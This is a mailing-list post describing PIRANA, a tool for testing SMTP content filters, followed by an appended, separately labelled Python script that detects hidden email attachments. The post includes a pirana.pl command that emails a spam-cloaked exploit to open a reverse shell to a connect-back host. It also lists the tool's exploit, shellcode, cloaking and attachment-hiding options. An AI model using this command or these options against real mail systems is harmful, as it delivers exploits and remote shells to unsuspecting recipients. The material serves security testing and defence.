HackFest Series: Pirana Email Holiday Greetings

Author: Lisa Kachold
To: Main PLUG discussion list, PLUG Applcations List
Subject: HackFest Series: Pirana Email Holiday Greetings
Pirana

PIRANA is a penetration testing framework to help in checking an SMTP
content filter's security. It works by attaching an exploit to an
email, optionally disguising it from content filters. PIRANA also lets
you choose from different types of shellcode to use and has various
options to be stealthy.

http://www.guay-leroux.com/projects/SMTP%20content%20filters.pdf
http://backtrack.offensive-security.com/index.php/Tools#Pirana

Posted last year at Xmas to the PLUG archives from Backtrack2 (obfuscated,
without full links or the correct pirana.pl spelling):
http://www.mail-archive.com/plug-discuss@lists.plug.phoenix.az.us/msg08695.html

The Bt2 HowTo:
http://www.linuxhaxor.net/?p=337

Solutions to protect include clamav/spamassassin but this could depend
on your spamassassin and other installation specifics.

Pirana.pl example: Connect back with a reverse shell just by sending an email
using cloaking.


$ pirana.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a
[EMAIL PROTECTED]


Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS]

Mandatory arguments:
  -e+           Exploit number to use (See below)
  -h+           SMTP server to test
  -a+           Destination email address used in probing


Optional arguments:
  -s+          Shellcode type to inject into exploits (See below)
  -c+          Cloaking style (See below)
  -d+          Try to vanish attachments from MUA's view (See below)
  -v            Attach EICAR virus to improve stealthness
  -z            Pack all the malware into a tarball to be less noisy
  -p+          Port to use in reverse shell or bind shell
  -l+           Host to connect back in reverse shell mode


Valid exploits numbers:
   0            OSVDB #5753:    LHA get_header File Name Overflow
   1            OSVDB #5754:    LHA get_header Directory Name Overflow
   2            OSVDB #6456:    file readelf.c tryelf() ELF Header Overflow
   3            OSVDB #11695:   unarj Filename Handling Overflow
   4            OSVDB #23460:   ZOO combine File and Dir name overflow
   5            OSVDB #15867:   Convert UUlib uunconc integer overflow
   6            OSVDB #XXX:     ZOO next offset infinite loop DoS


Valid shellcode types:
   0            TCP reverse shell
   1            UDP reverse shell
   2            TCP bind shell


Valid cloaking styles (consult whitepaper for visual result):
   0            No cloaking at all (default)
   1            Viagra spam message
   2            "Look at the pictures I promised you!"


Vanishing techniques for attachments:
   0            No vanishing at all (default)
   1            Multipart/alternative trick
   2            <img src="image.JPG" width=0 height=0> trick



Test Test Test!
Merry merry merry!
--
Skype: (623)239-3392
AT&T: (503)754-4452
http://uncyclopedia.wikia.com/wiki/Santa
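An added example from the defender's side (not part of Pirana or of the post above): a Python check, built on the standard library's email parser, that flags the two attachment-vanishing tricks listed in the usage output (multipart/alternative nesting and the zero-size <img> tag) in a message it is handed. The sample message it builds is constructed here, with placeholder bytes standing in for any archive.

```python
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# <img> tag carrying width=0 and height=0 in either order (quotes optional).
ZERO_IMG = re.compile(
    r"<img\b[^>]*\bwidth\s*=\s*[\"']?0\b[^>]*\bheight\s*=\s*[\"']?0\b"
    r"|<img\b[^>]*\bheight\s*=\s*[\"']?0\b[^>]*\bwidth\s*=\s*[\"']?0\b",
    re.IGNORECASE,
)


def _scan(part, inside_alternative, findings):
    ctype = part.get_content_type()
    if part.is_multipart():
        alt = inside_alternative or ctype == "multipart/alternative"
        for sub in part.iter_parts():
            _scan(sub, alt, findings)
        return
    # A MUA renders only one alternative, so a file nested here is never
    # shown to the user even though the server still accepted and stored it.
    hidden = part.get_filename() or part.get_content_maintype() != "text"
    if inside_alternative and hidden:
        findings.append("attachment hidden in multipart/alternative: "
                        f"{part.get_filename() or ctype}")
    if ctype == "text/html" and ZERO_IMG.search(part.get_content()):
        findings.append("zero-size <img> reference in HTML body")


def find_hidden_attachments(raw: bytes) -> list[str]:
    """Return one finding per hiding trick seen; an empty list means none."""
    findings = []
    _scan(BytesParser(policy=policy.default).parsebytes(raw), False, findings)
    return findings


def build_sample() -> bytes:
    """Constructed message using both tricks; the 'archive' is placeholder bytes."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Look at the pictures I promised you!"
    msg.set_content("Pictures attached.")
    msg.add_alternative('<p>Hi!<img src="image.JPG" width=0 height=0></p>',
                        subtype="html")
    hidden = EmailMessage()  # attached inside the alternative, not beside it
    hidden.set_content(b"not a real archive", maintype="application",
                       subtype="zip", filename="pictures.zip")
    msg.attach(hidden)
    return msg.as_bytes()
```

Run `find_hidden_attachments(build_sample())` to see both findings; a plain text/plain message or an ordinary text+HTML alternative without the tag yields an empty list.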